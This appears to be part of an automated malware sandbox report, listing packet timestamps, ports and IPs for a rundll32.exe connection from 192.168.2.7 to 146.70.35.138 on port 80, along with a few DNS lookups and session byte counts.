Apr 22, 2022 15:27:19.423091888 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423109055 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423177958 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423372030 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423403025 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423428059 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423448086 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423455000 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423474073 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423480034 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423502922 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423530102 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423538923 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423546076 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423584938 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423619986 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423623085 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423646927 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423662901 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423685074 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423702002 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423742056 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423794031 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423821926 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423839092 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423854113 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423863888 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423887014 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423888922 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423906088 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423917055 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423943043 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423964024 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.423989058 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.424005032 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.424036980 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.424053907 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.424103975 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.462908983 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.462955952 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.462981939 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.462999105 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.463015079 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.463032007 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.463069916 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.463145018 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.464476109 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.464536905 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.464545965 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.464555025 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.464689970 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.464783907 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465156078 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465188026 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465213060 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465231895 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465264082 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465272903 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465302944 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465325117 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465332985 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465348005 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465363979 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465385914 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465415001 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465428114 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465502024 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465527058 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465543032 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465562105 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465567112 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465590954 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465611935 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465614080 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465631008 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465639114 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465683937 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.465698957 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.465780973 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.506732941 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506783009 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506808043 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506824970 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506849051 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506870985 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506870985 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.506894112 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506911039 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506922007 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.506933928 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506956100 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506958961 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.506979942 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.506988049 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.506995916 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.507019043 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.507040977 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.507046938 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.507064104 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.507080078 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.507090092 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.507100105 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.507119894 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.507405996 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.716505051 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.741142035 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:20.120021105 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:20.120052099 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:20.120165110 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:28:21.255120993 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 22, 2022 15:26:57.316037893 CEST | 8.8.8.8 | 192.168.2.7 | 0x9880 | No error (0) | 13.107.43.16 | A (IP address) | IN (0x0001) | ||
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | a-0019.a.dns.azurefd.net | CNAME (Canonical name) | IN (0x0001) | ||
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | a-0019.standard.a-msedge.net | CNAME (Canonical name) | IN (0x0001) | ||
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | 204.79.197.222 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.7 | 49775 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 22, 2022 15:27:17.806870937 CEST | 1052 | OUT | |
Apr 22, 2022 15:27:18.182925940 CEST | 1053 | IN |